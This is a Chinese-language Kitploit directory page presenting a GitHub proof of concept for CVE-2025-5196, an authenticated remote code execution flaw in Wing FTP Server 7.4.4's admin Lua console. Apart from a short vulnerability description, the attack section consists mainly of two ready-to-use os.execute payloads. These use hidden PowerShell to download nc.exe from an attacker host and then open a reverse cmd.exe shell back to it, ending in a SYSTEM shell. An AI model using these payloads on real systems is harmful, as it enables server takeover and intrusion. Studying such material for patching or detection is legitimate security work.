Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Wing-FTP-Server-7.4.4-RCE-Authenticated — Wing FTP Server 通过其 Web 界面提供了一个管理性的 Lua 脚本控制台。经过身份验证的管理员能够在沙箱隔离不足的情况下执行任意 Lua 代码。CVE-2025-5196 | Kitploit
工具/GitHubGitHub/nouvexr/wing-ftp-server-7.4.4-rce-authenticated
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubnouvexr/wing-ftp-server-7.4.4-rce-authenticated

Wing-FTP-Server-7.4.4-RCE-Authenticated

Wing FTP Server 通过其 Web 界面提供了一个管理性的 Lua 脚本控制台。经过身份验证的管理员能够在沙箱隔离不足的情况下执行任意 Lua 代码。CVE-2025-5196

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
2121年前尚未审核
分享

Wing FTP Server 7.4.4 - 远程代码执行(需认证)(CVE-2025-5196)

Wing FTP Server 提供了一个可通过其 Web 界面访问的管理 Lua 脚本控制台。经过身份验证的管理员能够执行任意 Lua 代码,但其沙箱机制不足。

受影响版本:Wing FTP Server 7.4.4 (Windows) | 需要身份验证:是


下载与发布说明

截至2025年5月24日,供应商提供的最新版本应用程序可通过以下链接获取:https://www.wftpserver.com/download.htm

此外,需要注意的是,截至同一日期,已发布一则发布说明,告知在7.4.4版本中修复了该RCE漏洞。发布说明的链接可在此处找到:https://www.wftpserver.com/serverhistory.htm image


PoC

与 CVE-2025-5196 相关的 PoC VulDB image

Wing FTP Server Web 界面

image

image

命令的第一部分会将 nc.exe(适用于 Windows x86 的 netcat)下载到路径 "C:\Users\usuario\Desktop\Drops"。第二部分将执行 nc.exe 192.168.234.131 4443 -e cme.exe。

root@kitploit:~
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
root@kitploit:~
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')

image

NT/SYSTEM Shell image

下载工具